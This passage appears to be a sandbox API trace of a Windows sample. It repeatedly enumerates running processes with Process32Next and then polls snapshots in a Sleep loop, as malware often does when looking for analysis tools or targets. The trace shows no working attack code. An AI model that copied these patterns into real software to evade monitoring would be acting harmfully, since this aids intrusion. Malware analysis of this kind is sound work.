hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.149] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.151] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.153] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.155] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.157] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.158] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.160] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.162] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.164] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.165] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.167] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.169] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x47, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.171] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.172] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.174] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.176] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.178] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.180] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.181] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.183] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0106.188] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.190] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0106.191] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.193] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.195] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0106.197] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0106.199] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0106.201] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0106.202] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.204] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.206] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0106.208] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0106.210] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0106.211] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0106.213] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0106.215] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0106.217] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0106.219] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0106.220] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0106.222] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0106.224] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0106.226] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0106.227] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0106.229] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0106.235] Process32Next (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0106.273] Sleep (dwMilliseconds=0x64) [0106.389] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0106.398] Process32First (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.472] Sleep (dwMilliseconds=0x64) [0106.575] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0106.584] Process32First (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.645] Sleep (dwMilliseconds=0x64) [0106.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0106.760] Process32First (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.817] Sleep (dwMilliseconds=0x64) [0106.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0106.929] Process32First (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.003] Sleep (dwMilliseconds=0x64) [0107.107] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0107.116] Process32First (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.189] Sleep (dwMilliseconds=0x64) [0107.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0107.304] Process32First (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.402] Sleep (dwMilliseconds=0x64) [0107.538] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0107.548] Process32First (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.655] Sleep (dwMilliseconds=0x64) [0107.762] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0107.775] Process32First (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.838] Sleep (dwMilliseconds=0x64) [0107.951] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0107.961] Process32First (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.019] Sleep (dwMilliseconds=0x64) [0108.123] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0108.134] Process32First (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.211] Sleep (dwMilliseconds=0x64) [0108.327] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1c08 [0108.339] Process32First (in: hSnapshot=0x1c08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.452] Sleep (dwMilliseconds=0x64) [0108.563] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0108.576] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.640] Sleep (dwMilliseconds=0x64) [0108.747] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0108.756] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.817] Sleep (dwMilliseconds=0x64) [0108.919] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0108.928] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.993] Sleep (dwMilliseconds=0x64) [0109.114] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0109.124] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.183] Sleep (dwMilliseconds=0x64) [0109.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0109.303] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.367] Sleep (dwMilliseconds=0x64) [0109.482] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0109.490] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.548] Sleep (dwMilliseconds=0x64) [0109.653] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0109.664] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.722] Sleep (dwMilliseconds=0x64) [0109.831] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0109.846] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0109.924] Sleep (dwMilliseconds=0x64) [0110.028] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0110.041] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.103] Sleep (dwMilliseconds=0x64) [0110.215] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0110.227] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.300] Sleep (dwMilliseconds=0x64) [0110.404] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0110.414] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.511] Sleep (dwMilliseconds=0x64) [0110.612] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0110.623] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.685] Sleep (dwMilliseconds=0x64) [0110.799] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0110.809] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0110.902] Sleep (dwMilliseconds=0x64) [0111.017] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0111.027] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.098] Sleep (dwMilliseconds=0x64) [0111.205] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0111.217] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.294] Sleep (dwMilliseconds=0x64) [0111.415] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x18f4 [0111.468] Process32First (in: hSnapshot=0x18f4, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, 